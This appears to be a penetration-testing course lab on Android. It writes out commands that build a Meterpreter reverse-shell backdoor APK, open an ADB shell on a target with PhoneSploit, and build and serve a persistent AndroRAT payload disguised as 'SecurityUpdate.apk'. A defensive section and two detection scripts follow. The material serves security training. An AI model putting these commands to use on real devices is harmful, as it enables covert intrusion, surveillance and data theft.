Module 17: Hacking Mobile Platforms

Lab 1: Hack Android Devices

Overview of Hacking Android Platforms

Android is a software environment developed by Google for mobile devices. It includes an OS, middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java API Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [HAL], and Linux kernel) and five layers.

Owing to the increase in the number of users with Android devices, these devices have become primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spearphone attacks.

Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security

Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk

This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.10.1.13 is the IP address of the Parrot Security machine.

Task 2: Harvest Users’ Credentials using the Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helping natures.

Task 3: Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform

Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Task 4: Exploit the Android Platform through ADB using PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

python3 -m pip install colorama

colorama is a Python library for cross-platform colored terminal text. It simplifies adding colors and styles to terminal output, making it more readable and engaging.

python3 phonesploit.py
  • Type 3 and press Enter to select [3] Connect a new phone option.

  • When prompted to Enter a phones ip address, type the target Android device’s IP address and press Enter.

  • Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.

  • When prompted to Enter a device name, type the target Android device’s IP address and press Enter.

  • You can observe that a shell command line appears, as shown in the screenshot.
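A defender-side check for the network ADB exposure described in this task, added here as an example that is not part of the original lab. It parses the output of adb shell getprop collected from a managed device and reports whether adbd is set to listen on TCP. The sample output is constructed and the function names are hypothetical.

```python
import re

# Constructed sample of `adb shell getprop` output from a managed device
# (values are illustrative, not taken from the lab).
SAMPLE_GETPROP = """\
[ro.build.version.release]: [13]
[ro.debuggable]: [0]
[persist.sys.usb.config]: [mtp,adb]
[service.adb.tcp.port]: [5555]
[persist.adb.tcp.port]: []
"""

PROP_LINE = re.compile(r"^\[([^\]]+)\]:\s*\[(.*)\]\s*$")


def parse_getprop(text):
    """Turn `[key]: [value]` lines into a dict, ignoring anything else."""
    props = {}
    for line in text.splitlines():
        m = PROP_LINE.match(line)
        if m:
            props[m.group(1)] = m.group(2)
    return props


def adb_findings(props):
    """Return a list of (severity, message) tuples for ADB-related exposure."""
    findings = []
    for key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
        value = props.get(key, "").strip()
        # Empty, 0 or -1 means adbd is not told to listen on TCP.
        if value.lstrip("-").isdigit() and int(value) > 0:
            msg = f"{key}={value}: adbd listens on the network"
            if key.startswith("persist."):
                msg += " and the setting survives reboot"
            findings.append(("high", msg))
    if "adb" in props.get("persist.sys.usb.config", "").split(","):
        findings.append(("medium", "USB debugging is enabled"))
    if props.get("ro.debuggable") == "1":
        findings.append(("medium", "debuggable build: adbd can run as root"))
    return findings


if __name__ == "__main__":
    for severity, message in adb_findings(parse_getprop(SAMPLE_GETPROP)):
        print(f"[{severity}] {message}")
```

Running adb usb against the device, or turning off USB and wireless debugging in Developer options, returns adbd to USB-only mode and clears the high finding.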

Task 5: Hack an Android Device by Creating APK File using AndroRAT

AndroRAT is a tool designed to give a remote user control of an Android system and to retrieve information from it. It is a client/server application: the client side is developed in Java for Android and the server is written in Python. AndroRAT provides a fully persistent backdoor to the target device because the app starts automatically on device boot-up. It also obtains the current location, SIM card details, IP address, and MAC address of the device.

python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
  • --build: builds the APK

  • -i: specifies the local IP address (here, 10.10.1.13)

  • -p: specifies the port number (here, 4444)

  • -o: specifies the output APK file (here, SecurityUpdate.apk)

cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/

If the share folder does not exist, then execute the following commands to create a share folder and assign required permissions to it:

  • Type mkdir /var/www/html/share and press Enter to create a shared folder

  • Type chmod -R 755 /var/www/html/share and press Enter

  • Type chown -R www-data:www-data /var/www/html/share and press Enter

service apache2 start
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
  • --shell: starts the interpreter

  • -i: specifies the IP address for listening (here, 0.0.0.0)

  • -p: specifies the port number (here, 4444)

You can also use other Android hacking tools such as

  • NetCut (https://www.arcai.com)

  • drozer (https://labs.f-secure.com)

  • zANTI (https://www.zimperium.com)

  • Network Spoofer (https://www.digitalsquid.co.uk)

  • DroidSheep (https://droidsheep.info)

Lab 2: Secure Android Devices using Various Android Security Tools

Overview of Android Security Tools

Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.

Task 1: Analyze a Malicious App using Online Android Analyzers

Online Android analyzers allow you to scan Android APK packages and perform security analyses to detect vulnerabilities in particular apps. Trusted online Android analyzers include Sixo Online APK Analyzer.
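A local first-pass triage to complement an online analyzer, added here as an example that is not part of the original lab. It reads a permission listing extracted from an APK and flags the combination of capabilities this module attributes to a remote-access app (network control, start on boot, location, SIM details). The listing is constructed, and the capability-to-permission mapping and function names are assumptions of this example.

```python
import re

# Constructed permission listing in the style of `aapt dump permissions`
# output; the package name and permission set are illustrative.
SAMPLE_LISTING = """\
package: com.example.securityupdate
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECEIVE_BOOT_COMPLETED'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.READ_PHONE_STATE'
uses-permission: name='android.permission.VIBRATE'
"""

# Assumed mapping from the behaviours described in this module to the
# standard Android permissions an app needs in order to perform them.
CAPABILITIES = {
    "network channel": {"INTERNET"},
    "start on boot": {"RECEIVE_BOOT_COMPLETED"},
    "location tracking": {"ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION"},
    "SIM and device identifiers": {"READ_PHONE_STATE"},
}
DATA_SOURCES = {"location tracking", "SIM and device identifiers"}

PERM = re.compile(r"android\.permission\.([A-Z_]+)")


def requested_permissions(listing):
    """Collect the android.permission.* names that appear in the listing."""
    return set(PERM.findall(listing))


def triage(listing):
    """Map permissions to capabilities and decide whether to review by hand."""
    perms = requested_permissions(listing)
    caps = {name for name, needed in CAPABILITIES.items() if perms & needed}
    # Each permission alone is common in legitimate apps. A network channel
    # plus boot persistence plus a personal-data source is worth a manual look.
    review = ({"network channel", "start on boot"} <= caps
              and bool(caps & DATA_SOURCES))
    return {"capabilities": sorted(caps), "review": review}


if __name__ == "__main__":
    print(triage(SAMPLE_LISTING))
```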

You can also use other Android vulnerability scanners such as

  • X-Ray 2.0 (https://duo.com)

  • Vulners Scanner (https://play.google.com)

  • Shellshock Scanner - Zimperium (https://play.google.com)

  • Yaazhini (https://www.vegabird.com)

  • Quick Android Review Kit (QARK) (https://github.com)

Task 2: Secure Android Devices from Malicious Apps using Malwarebytes Security

Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.

You can use other mobile antivirus and anti-spyware tools such as

  • AntiSpy Mobile (https://antispymobile.com)

  • Spyware Detector - Spy Scanner (https://play.google.com)

  • iAmNotified - Anti Spy System (https://iamnotified.com)

  • Privacy Scanner (AntiSpy) Free (https://play.google.com)




Hacker's Mantra: Pattern is often predictable, and anything predictable can be hacked. - Aniekee Tochukwu Ezekiel